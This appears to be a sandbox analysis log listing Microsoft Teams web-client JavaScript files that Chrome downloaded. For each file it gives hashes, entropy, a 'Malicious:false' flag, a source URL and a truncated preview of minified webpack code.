                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):406986
                                                                                                                                                                                                                                                                            Entropy (8bit):5.31836569617146
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:f5+ROkZBKxn7oW/sKni2JcPwRTQx4J77m7mBdhh2uZifxOjrCpaLmnF:uOkWxp/Fi9Nxe7maZc7F
                                                                                                                                                                                                                                                                            MD5:E40761677762EAB0692F86B259C7D744
                                                                                                                                                                                                                                                                            SHA1:34A9B50CEC6E1163CEEFCD4D394DB6524C89A854
                                                                                                                                                                                                                                                                            SHA-256:DA4A8DF0C326292B5BEE9C732B3C962FD67AAF2F99D850F1BF65068D573C5619
                                                                                                                                                                                                                                                                            SHA-512:04FA1D6074AD24E3ABAB53D1DE116A6B39B4BE3DFABC082427F1C5A169E50527561F160CC133C2AC4AEDC4E7AC404572F60E531A4618111EA74D138B2B0DD034
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[8],Array(533).concat([f
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (53670)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):53798
                                                                                                                                                                                                                                                                            Entropy (8bit):5.230039416671407
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:S+yEFdQ+a4BitfPsk2lvRCkl67sCtbK6xYSZdj6qYMvnshwdWeMg3r:1dsFsk2lLc1Zb
                                                                                                                                                                                                                                                                            MD5:4305A98733CD8A3B3F365BDEEECF0249
                                                                                                                                                                                                                                                                            SHA1:D62D1C89267292689AD19BAF36141BD68505FABF
                                                                                                                                                                                                                                                                            SHA-256:5475C34EA8E2478D7C44EF365C2F476DC80C26DDEA2099A13006AD383F35A523
                                                                                                                                                                                                                                                                            SHA-512:65FA7A5E8DE9BF97FC0E366E768B877C2F9A85D5780ED18341B6AF878D5E9B0DDAE058F58A0291C731A9492FEA40DB463B22952D1B2D0B71E9DF0A1DC228AB0D
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/420340-fadd8cd32aedf874.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[420340],{944244:e=>{"use strict";var t=function(e){return function(e){return!!e&&"object"==typeof e}(e)&&!function(e){var t=Object.prototype.toString.call(e);return"[object RegExp]"===t||"[object Date]"===t||function(e){return e.$$typeof===s}(e)}(e)};var s="function"==typeof Symbol&&Symbol.for?Symbol.for("react.element"):60103;function r(e,t){return!1!==t.clone&&t.isMergeableObject(e)?a((s=e,Array.isArray(s)?[]:{}),e,t):e;var s}function i(e,t,s){return e.concat(t).map((function(e){return r(e,s)}))}function n(e){return Object.keys(e).concat(function(e){return Object.getOwnPropertySymbols?Object.getOwnPropertySymbols(e).filter((function(t){return Object.propertyIsEnumerable.call(e,t)})):[]}(e))}function o(e,t){try{return t in e}catch(e){return!1}}function l(e,t,s){var i={};return s.isMergeableObject(e)&&n(e).forEach((function(t){i[t]=r(e[t],s)})),n(t).forEach((function(n){(function(e,t){ret
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):66303
                                                                                                                                                                                                                                                                            Entropy (8bit):5.329796834057744
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:YCqR3ciA/k/Pp5QAQE29MsMS5GTB/lK1Umi3NpFDWDKq+ApIOdzKqd:YSimQst0B/A1Umi3NpFDWDKq+ApIOdGY
                                                                                                                                                                                                                                                                            MD5:AFF12B8E4EAFD12437A222BB1BF39D7F
                                                                                                                                                                                                                                                                            SHA1:9102DF20D80DEBE548E4EF7FA05B7FD3433A8B91
                                                                                                                                                                                                                                                                            SHA-256:C485C1094B434E259D4D7D01FF84F08F0A52C1B4331B808B30858E291E128B37
                                                                                                                                                                                                                                                                            SHA-512:489F056F80D44517BF65967FA4713D5175E13C7BC999D8153F3C81ED1073A1454BCFF0356F774196C8B4B52A787843C00F88E1E88476F2189C0ADD5F1C4DED1F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/897526-8998364aa055a4c6.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[897526],{403966:(e,t,r)=>{r.d(t,{F:()=>i});const i=globalThis.performance},38176:(e,t,r)=>{r.d(t,{$:()=>i});const i={verbose:10,default:20,error:30}},964633:(e,t,r)=>{function i(e,t){if(!e)throw new Error("number"==typeof t?`0x${t.toString(16).padStart(3,"0")}`:t)}r.d(t,{v:()=>i})},362008:(e,t,r)=>{r.d(t,{f:()=>b});var i=r(964633);const n=432e6;var o=r(753343),s=r(734389),a=r(674344);const c="fluidDriverCache",l="driverStorage.V3",d={1:"diverStorage",2:"diverStorage.V2"};function u(e){return`${e.file.docId}_${e.type}_${e.key}`}function h(e){return new Promise(((t,r)=>{(0,a.P2)(c,3,{upgrade:(t,r)=>{try{const e=d[r];e&&t.deleteObjectStore(e)}catch(t){(0,o.pW)({logger:e}).sendErrorEvent({eventName:"FluidCacheDeleteOldDbError"},t)}const i=t.createObjectStore(l);i.createIndex("createdTimeMs","createdTimeMs"),i.createIndex("lastAccessTimeMs","lastAccessTimeMs"),i.createIndex("parti
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (33000)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):33108
                                                                                                                                                                                                                                                                            Entropy (8bit):5.412771564965738
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:t3njFfVkZBauR0Rke9v54B+jjkasi6juRYb0AKnOU1ovzywyu3CMMRtw2L6HNPjE:28uR0RkeMjuRYb0AKnOU1ovzywyptw2b
                                                                                                                                                                                                                                                                            MD5:151E852AC972E6EB3FF7F799813CACFE
                                                                                                                                                                                                                                                                            SHA1:730FE4CC00AF6B36026AFC895C0055EB2FC20F98
                                                                                                                                                                                                                                                                            SHA-256:E066550039057E9E563F40FA2D1856088F49274A34E586565D56A573690F1B5C
                                                                                                                                                                                                                                                                            SHA-512:2D37C4E3403E06D6062E9783C9A2AEDE3F106ECFD6192F23F1F4AF05C17F51767838A1D894BD7E7D1261D52A2B339B0D1A288CE1978D280A2BB67F6D0EE557C1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[669152],{380015:(r,e,o)=>{o.d(e,{h:()=>l,m:()=>u});var a=o(594900),t=o(649380),d=o(197609);const n=t.TQ.reduce(((r,e)=>{const o=e.slice(0,1).toUpperCase()+e.slice(1),t={[`colorPalette${o}Background1`]:a.yd[e].shade40,[`colorPalette${o}Background2`]:a.yd[e].shade30,[`colorPalette${o}Background3`]:a.yd[e].primary,[`colorPalette${o}Foreground1`]:a.yd[e].tint30,[`colorPalette${o}Foreground2`]:a.yd[e].tint40,[`colorPalette${o}Foreground3`]:a.yd[e].tint20,[`colorPalette${o}BorderActive`]:a.yd[e].tint30,[`colorPalette${o}Border1`]:a.yd[e].primary,[`colorPalette${o}Border2`]:a.yd[e].tint20};return Object.assign(r,t)}),{});n.colorPaletteRedForeground3=a.yd.red.tint30,n.colorPaletteRedBorder2=a.yd.red.tint30,n.colorPaletteGreenForeground3=a.yd.green.tint40,n.colorPaletteGreenBorder2=a.yd.green.tint40,n.colorPaletteDarkOrangeForeground3=a.yd.darkOrange.tint30,n.colorPaletteDarkOrangeBor
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65531), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):173803
                                                                                                                                                                                                                                                                            Entropy (8bit):5.435973488429615
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:VDWojvgYZEmp+zI9ozcpVuPZcBdtPXWmI+qoLSSd2tc:bjD1p+EWIEmWmzXd2S
                                                                                                                                                                                                                                                                            MD5:BB2D39B8A73F6A115B280A3496DCBE9D
                                                                                                                                                                                                                                                                            SHA1:A3D96508881DA6910FEFECDD7FAC9A8D799DB675
                                                                                                                                                                                                                                                                            SHA-256:E07497411ECC01872DEDD5409C25EEBAB3EB979322E5E00395F728F9E058FAAE
                                                                                                                                                                                                                                                                            SHA-512:E4D4BC86E8D46A1C9AD536E6606534D84F094073D793A94C48FA6016D15172343278CE9A1F5051023560EAF24A706DA12EC92C2D448F41AF1F18C5E119AE6AB2
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[283032],{635217:(e,t,n)=>{n.d(t,{H:()=>f,r:()=>y});var i=n(747885),r=n(187655),o=n(274085),a=n(364819);const s=(e,t,n)=>e&&0!==e.length?async i=>{if(!i)return{handled:!1,result:null};const r=t(i,e,n);let o;do{o=r.next(o&&o.value),o.value instanceof Promise&&(o.value=await o.value)}while(!o.done);const a=o;return{handled:a&&a.value&&a.value.handled,transientHandled:a&&a.value&&a.value.transientHandled,result:a&&a.value&&a.value.result}}:()=>Promise.resolve({handled:!1,result:null}),l=(e,t,n)=>c(e,t)&&(!e.findParent||!!n&&g(e.findParent,n)),c=(e,t)=>{if(t.type===i.L.ElementType.Text)return m(e.filter,"text");if(m(e.filter,t.name||"",void 0))return!0;for(const n of(0,a.keys)(t.attribs))if(m(e.filter,n)||m(e.filter,n,i.L.DomUtils.getAttributeValue(t,n)))return!0;return!1},d=(e,t,n)=>function*(i,r,o){let a,s=!1,c=i;for(const i of r){if(!c)break;if(!l(i,c,o))continue;let r=i.handle
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1432)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):1540
                                                                                                                                                                                                                                                                            Entropy (8bit):5.000460293458999
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24:wp3sp38vGvrwybSH4oxGsKsR/SUnH8PZvLOW4Tao8XhdqkrSO7yyjIzgYb0:wp3sp39vE1TgtSvyIzp0
                                                                                                                                                                                                                                                                            MD5:896D419D1C1A474F2985AE19A11E43AF
                                                                                                                                                                                                                                                                            SHA1:DCC73A06352D2FF9B1358082DEDFD3B905448063
                                                                                                                                                                                                                                                                            SHA-256:9F191C3167D50BFFD4CD6F68EB2D63B124E99C08AF7381069952BAC9E7C4A19C
                                                                                                                                                                                                                                                                            SHA-512:4A81C80710B63C81D6EDF35CD3B26B4C4B8C87D2F3C45C88D4ADB3CC6B0B8A26EB543219399CC6D1A949983AF55FC54AD1D687883ED9DFF1AA849F632FDF3A14
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/416397-1c547cab2265aa75.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[416397],{416397:(e,a,t)=>{t.d(a,{Z:()=>r});var C=t(513432),s=t(395225),l=t.n(s),c=t(485529),n=t(829289),r=(0,c.Ke)({svg:function(e){var a=e.classes;return C.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:a.svg},C.createElement("path",{className:l()(n.Q.filled,a.filledPart),d:"M6.75 10C6.75 10.9665 5.9665 11.75 5 11.75C4.0335 11.75 3.25 10.9665 3.25 10C3.25 9.0335 4.0335 8.25 5 8.25C5.9665 8.25 6.75 9.0335 6.75 10ZM11.75 10C11.75 10.9665 10.9665 11.75 10 11.75C9.0335 11.75 8.25 10.9665 8.25 10C8.25 9.0335 9.0335 8.25 10 8.25C10.9665 8.25 11.75 9.0335 11.75 10ZM15 11.75C15.9665 11.75 16.75 10.9665 16.75 10C16.75 9.0335 15.9665 8.25 15 8.25C14.0335 8.25 13.25 9.0335 13.25 10C13.25 10.9665 14.0335 11.75 15 11.75Z"}),C.createElement("path",{className:l()(n.Q.outline,a.outlinePart),d:"M6.25 10C6.25 10.6904 5.69036 11.25 5 11.25C4.30964 11.2
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):89359
                                                                                                                                                                                                                                                                            Entropy (8bit):5.0428571426668665
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:4oHHHkXstnefJ5HfQ2vHpY5CFh3NDlQ+h4D5CwaWIWmXuIYGtP+ztrVS2yjhAABJ:FnXHEkLpZlc
                                                                                                                                                                                                                                                                            MD5:DCED61FA868D7864FE3ABFA48ED29F7F
                                                                                                                                                                                                                                                                            SHA1:230831790AEFA04B3CA2D3D1CCC81A25B58F0AAE
                                                                                                                                                                                                                                                                            SHA-256:0D6CD5309375084F03E2203EB81DC1CFE75C2CF48095AB04936E2A44AC3ACB0B
                                                                                                                                                                                                                                                                            SHA-512:DC008E687190D8A01A96079759D991B1549342221EF52B1C4FD4B3290D6F43A2DF7AC1D410FE4FD19E719D9CA7A990928A279703892FE3E6783BE029AEF30FA5
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[931740],{169471:e=>{e.exports=[{types:{OneGQL_ChannelCardContentViewData:[2,{aboutLabel:6,sensitivityLabel:6,inThisChannelLabel:6,seeChannelLabel:6,getLinkToChannelLabel:6,getEmailAddressLabel:6,leaveChannelLabel:6}],OneGQL_ChannelCardHeaderViewData:[2,{standardLabel:6,privateLabel:6,sharedLabel:6,externalLabel:6,addMembersLabel:6,shareChannelWithPersonLabel:6,shareChannelWithTeamLabel:6,manageChannelLabel:6,channelNotificationsLabel:6,teamAvatarLabel:6}],OneGQL_ChannelCardViewData:[2,{channelCardHeaderModel:"OneGQL_ChannelCardHeaderViewData!",channelCardContentModel:"OneGQL_ChannelCardContentViewData!"}],OneGQL_LeftRailFilterInput:[6,{pills:"[OneGQL_SimpleCollabFilterTag]",text:1}],OneGQL_SimpleCollabFilterTag:[5,["CHATS","TEAMS_AND_CHANNELS","MENTIONS","MEETINGS","MUTED","UNREAD","NON_MEETING_CHATS","UNMUTED"]],OneGQL_SimpleCollabLeftRailViewData:[2,{simpleCollabHeaderLabel:6,simpleColl
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (27783)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):27891
                                                                                                                                                                                                                                                                            Entropy (8bit):5.439202906104346
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:gSSqn2uZfveZqHvxFdqfGNSPTRzotoNGMT5tT5GiYlWT5KT5TbVcUWA9h5D1rRyX:tf+OxtoskfFQLfrs
                                                                                                                                                                                                                                                                            MD5:F1AA9D0B9892214B52C3AC52DF2C0DE7
                                                                                                                                                                                                                                                                            SHA1:1E3E28897A2F8078CB3300D1CCA46B514BC0B2A9
                                                                                                                                                                                                                                                                            SHA-256:B62E880D4D12C0CAD366CC04D9B81E6E1CAC198C00829C3AADF94634D2449368
                                                                                                                                                                                                                                                                            SHA-512:BBCC11664D863D5992D5863FCA04BFB26C0ED5AB9AF7D6C1ED28ECBA6FA27C20DCC633DFFC5A593878A6190D154498CA28A2F05E70E4DD377A2111B947FC6A9F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[417548],{485202:(t,e)=>{"use strict";e.byteLength=function(t){var e=s(t),r=e[0],n=e[1];return 3*(r+n)/4-n},e.toByteArray=function(t){var e,r,i=s(t),f=i[0],u=i[1],h=new o(function(t,e,r){return 3*(e+r)/4-r}(0,f,u)),a=0,c=u>0?f-4:f;for(r=0;r<c;r+=4)e=n[t.charCodeAt(r)]<<18|n[t.charCodeAt(r+1)]<<12|n[t.charCodeAt(r+2)]<<6|n[t.charCodeAt(r+3)],h[a++]=e>>16&255,h[a++]=e>>8&255,h[a++]=255&e;2===u&&(e=n[t.charCodeAt(r)]<<2|n[t.charCodeAt(r+1)]>>4,h[a++]=255&e);1===u&&(e=n[t.charCodeAt(r)]<<10|n[t.charCodeAt(r+1)]<<4|n[t.charCodeAt(r+2)]>>2,h[a++]=e>>8&255,h[a++]=255&e);return h},e.fromByteArray=function(t){for(var e,n=t.length,o=n%3,i=[],f=16383,s=0,h=n-o;s<h;s+=f)i.push(u(t,s,s+f>h?h:s+f));1===o?(e=t[n-1],i.push(r[e>>2]+r[e<<4&63]+"==")):2===o&&(e=(t[n-2]<<8)+t[n-1],i.push(r[e>>10]+r[e>>4&63]+r[e<<2&63]+"="));return i.join("")};for(var r=[],n=[],o="undefined"!=typeof Uint8Array?Uint8Array:Array
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (5155)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):5263
                                                                                                                                                                                                                                                                            Entropy (8bit):5.151157042119288
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:ThGNjzj4jiRGi3wGNiU2BuPRELEYQncbQlyGJO/s4fFWVqXsJsLsGDs+1sarbHJS:9GNjzj4jiRGi3wGNi+PRELEYQcb9G6fc
                                                                                                                                                                                                                                                                            MD5:FC497DFB2A08F21B1A7D8866B7638247
                                                                                                                                                                                                                                                                            SHA1:8E1D63D4885BA36E77B9BF0E149E862830DF07BB
                                                                                                                                                                                                                                                                            SHA-256:BBCEDE435B654241D9980D457BC579FB4949EF3CEA216FC87DBE87CDF99CEB20
                                                                                                                                                                                                                                                                            SHA-512:CF04997AC8CD1E64F10013B04A20A4DC41B79FD90F00CBF5783A7802BF3DEBB8F726F83ADB65EA03E581F285121FC6A943D4FF932EA6EEB0DE036FDD6D854C99
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/711005-dcc14d48e317723d.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[711005,933386],{845155:e=>{e.exports=function(e,n,t,r,o,i,u,a){if(!e){var s;if(void 0===n)s=new Error("Minified exception occurred; use the non-minified dev environment for the full error message and additional helpful warnings.");else{var c=[t,r,o,i,u,a],v=0;(s=new Error(n.replace(/%s/g,(function(){return c[v++]})))).name="Invariant Violation"}throw s.framesToPop=1,s}}},711005:(e,n,t)=>{t.r(n),t.d(n,{NovaCentralizedCommandingProvider:()=>s,NovaEventingInterceptor:()=>y,NovaEventingProvider:()=>E,NovaGraphQLProvider:()=>R,graphql:()=>G,mapEventMetadata:()=>k,useFragment:()=>M,useLazyLoadQuery:()=>L,useMutation:()=>_,useNovaCentralizedCommanding:()=>c,useNovaEventing:()=>b,useNovaGraphQL:()=>z,useNovaUnmountEventing:()=>N,usePaginationFragment:()=>S,useRefetchableFragment:()=>F,useSubscription:()=>Q});var r=t(513432),o=t.n(r),i=t(845155),u=t.n(i),a=o().createContext(null),s=({
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):129495
                                                                                                                                                                                                                                                                            Entropy (8bit):5.264148032458579
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:nvIDpltjnNK4MKEs6iifxAmrQ76GBtBkQjyMAz8f:ngS46MBkQio
                                                                                                                                                                                                                                                                            MD5:3C93003ED2005FC512F13D8296A28B2E
                                                                                                                                                                                                                                                                            SHA1:E080952C0FCDD6DC9136537D89C57B78E38512AF
                                                                                                                                                                                                                                                                            SHA-256:3131BF1591179C74E8D2020D73EB09742CA931075C3EA7BA5AFEFC4D76400814
                                                                                                                                                                                                                                                                            SHA-512:34E6940C6D7BF5F84B614499AAD8C60744ED2F8F8496603180B2BA419D7C6849B35E8DE80D0CD5E01AD83A42D20EA378DB85FD6A6398D69CD24C6D6EC6B0868F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/638637-20856706a13e593e.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[638637],{323707:(e,n,t)=>{var r=t(513432),l=t(253070);function a(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var u=new Set,o={};function i(e,n){s(e,n),s(e+"Capture",n)}function s(e,n){for(o[e]=n,e=0;e<n.length;e++)u.add(n[e])}var c=!("undefined"==typeof window||void 0===window.document||void 0===window.document.createElement),f=Object.prototype.hasOwnProperty,d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (10064)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):10172
                                                                                                                                                                                                                                                                            Entropy (8bit):4.547550271846478
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:1DCvHrSSd6kElXg4CFo4Qo420u+gUutyhmRpHphG:1DcSSkHlR4Z4xu+gTe
                                                                                                                                                                                                                                                                            MD5:53E24C0FC810CB59D318C9FB914D84E6
                                                                                                                                                                                                                                                                            SHA1:C108CA6642908D3DB4BE4A65084B367011309508
                                                                                                                                                                                                                                                                            SHA-256:E1F3872C5FFF14038BA2EE76FBB8DF2AF221B860CEEEF632492BF98B6AA344F8
                                                                                                                                                                                                                                                                            SHA-512:2AC0369C9E80360FDBF2F7D9F5A0E8239FAC737FF86144DCB0CD003031786AEA11F64A143ABD3C278C345030501E95E6133C080EA98680A709870A831A95147D
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/214218-d26bcec144ea0bad.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[214218],{214218:(a,c,h)=>{h.d(c,{Eu3:()=>l,wYX:()=>Z,giK:()=>r,skF:()=>e,rKg:()=>H,t8b:()=>V,prg:()=>A,vqi:()=>M,Ptq:()=>m,mhc:()=>C,uVC:()=>d,rc1:()=>u,zVV:()=>U,bq_:()=>o,d2l:()=>p,jz:()=>t,$2:()=>g,CDe:()=>i,fS5:()=>R,rZY:()=>s,E4E:()=>w,bqg:()=>L,wx:()=>n,Ho1:()=>F,RJg:()=>k,dCO:()=>_});var v=h(693935);const l=(0,v.U)("Add20Regular","20",["M10 2.5a.5.5 0 0 0-1 0V9H2.5a.5.5 0 0 0 0 1H9v6.5a.5.5 0 0 0 1 0V10h6.5a.5.5 0 0 0 0-1H10V2.5Z"]),Z=(0,v.U)("Add24Regular","24",["M11.75 3c.38 0 .7.28.74.65l.01.1V11h7.25a.75.75 0 0 1 .1 1.5H12.5v7.25a.75.75 0 0 1-1.49.1V12.5H3.74a.75.75 0 0 1-.1-1.5H11V3.75c0-.41.34-.75.75-.75Z"]),r=(0,v.U)("AddCircle24Filled","24",["M12 2a10 10 0 1 1 0 20 10 10 0 0 1 0-20Zm0 5c-.38 0-.7.28-.74.65l-.01.1v3.5h-3.5a.75.75 0 0 0-.1 1.5h3.6v3.5a.75.75 0 0 0 1.5.1v-3.6h3.5a.75.75 0 0 0 .1-1.5h-3.6v-3.5A.75.75 0 0 0 12 7Z"]),e=(0,v.U)("AddCircle24Regular","2
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (21374)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):21482
                                                                                                                                                                                                                                                                            Entropy (8bit):5.450277752670294
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:tvcRoqqXG+VCveOSSxVOKI1PNcWfAfU+lJNwVA1Zt4N7TK07omHFeGvKbO0vBWwT:tvcRoqqXGgCveOSSxVOKI1PNcuAfU+lN
                                                                                                                                                                                                                                                                            MD5:476B18006649097B18D7BFA43AFC701F
                                                                                                                                                                                                                                                                            SHA1:0A541240E245F9CF3544768D7C9ACCE2442CD205
                                                                                                                                                                                                                                                                            SHA-256:714F5782F6A6AA99F008B4D892E977C8ADCF8B71791A16EE18E9DBC1CBBFDB12
                                                                                                                                                                                                                                                                            SHA-512:AB9EBC2808F69B391FC8730E53F83B8D001FDE7957B42626CB751A2E9FEAED0A5C137A2AC9C957D26A8A393AFA003D88C946DC9F988FD550F4B0BD4243FABCD8
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[129917],{791845:(e,t,n)=>{n.d(t,{g4:()=>r,oj:()=>l,En:()=>a});var o=n(513432);const i=()=>{},s={controller:{active:i,blur:i,find:i,first:i,focus:i,focusLastActive:i,scrollActiveIntoView:i,last:i,next:i,prev:i,showAttributes:i,hideAttributes:i,showFocusVisibleAttributes:i,hideFocusVisibleAttributes:i}},c=o.createContext(void 0),r=c.Provider,l=()=>{var e;return null!==(e=o.useContext(c))&&void 0!==e?e:s},a=()=>!!o.useContext(c)},854687:(e,t,n)=>{n.d(t,{Z:()=>h});var o=n(513432),i=n(602835),s=n(478304),c=n(642543),r=n(35871),l=n(277195);const a="data-activedescendant",u="data-activedescendant-focusvisible",d=e=>{if(!e)return;const t=f(e.parentElement);if(!t)return;const{offsetHeight:n}=e,o=p(e,t),{scrollMarginTop:i,scrollMarginBottom:s}=v(e),{offsetHeight:c,scrollTop:r}=t,l=o+n+s>r+c;o-i<r?t.scrollTo(0,o-i-2):l&&t.scrollTo(0,o+n+s-c+2)},f=e=>e?e.scrollHeight>e.offsetHeight?e:f(e
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):488546
                                                                                                                                                                                                                                                                            Entropy (8bit):5.627318568051973
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:i/JNz8JPeINQKxlLdgK5EkZyTdTIxVhl3qaMZZ2H+LLIIHW0F:45KCkZ7r3qaMZZ2H+LLIIHn
                                                                                                                                                                                                                                                                            MD5:59CB1B0DCFFAFDC09EDB8D088D756A86
